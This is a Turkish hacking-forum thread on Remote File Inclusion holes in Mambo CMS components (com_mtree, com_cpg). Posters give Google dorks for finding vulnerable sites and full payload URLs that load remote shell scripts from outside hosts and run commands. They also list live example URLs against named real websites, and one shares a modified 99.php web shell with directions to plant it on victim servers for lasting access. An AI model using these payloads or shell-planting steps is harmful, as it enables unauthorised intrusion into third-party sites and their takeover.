Mambo RFİ Güvenlik Açığı
-
Önce ki dökümanlarımızda RFİ yani Remote File İnlcusion hakkında bilgi verdik....
şimdi googleda nasıl aratıcaz siteleri şöyle:
"index.php?option=com_mtree"
sitenin sonuna yapacağımız ekleme:
components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath=http://members.lycos.co.uk/liz0zim/shell.txt?&cmd=id
bu olacak yani
http://siteadi.com/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath=http://members.lycos.co.uk/liz0zim/shell.txt?&cmd=id
kolay gelsn -
eyvallah hoca güzel bilgiler.hack sitesiyiz böle şeylere ağırlık verelim topiclerde.siyaset bu konuların önüne geçmesin
ölümüne hack konuları aq :D -
eyv oksi
-
zaten :D mambonun rfisi çoğaldı bu aralar :D
alında bendede size başka açık .
arama: inurl:"index.php?option=com_cpg"
www.siteadı.com/components/com_cpg/cpg.php?mosConfig_absolute_path=
örnek
http://www.lcjm.cz/components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=%2Fsrv4%2Fwww%2Flcjm.cz%2Fsubdomains%2Fwww&sort=0a
http://www.3d-model-shop.de/mambo/components/com_cpg/cpg.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=%2Fsrv%2Fwww%2Fhtdocs%2Fweb14%2Fhtml%2F&sort=0a
oksinin verdiğini şeysi :D örnek olarak
http://www.virtualgainesville.com/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http%3A%2F%2Fharunrasit89.sitemynet.com%2Fshell.php%3Fcmd&act=ls&d=C%3A%5Cwww&sort=0a
-
http://rapidshare.de/files/29824847/99.php.html
AntiOksidanın verdiği güvenlik açığı ile girebileceğiniz yer bir nevi panel ve ingilizce... yukardaki verdiğim ve benim düzenlediğim 99.php dosyasını Savant2 dizininin içine atıyorsunuz ve bir dahaki girişinizi
http://hedef site/components/com_mtree/Savant2/99.php şeklinde yapıyorsnuz. Artık panel türkçe. Hacke yeni başlayanlar ve ingilizcesi kötü olanlar için güzel bir kaynak. bLuetuLips RuLLz:)
Toplam Hit: 12168 Toplam Mesaj: 5
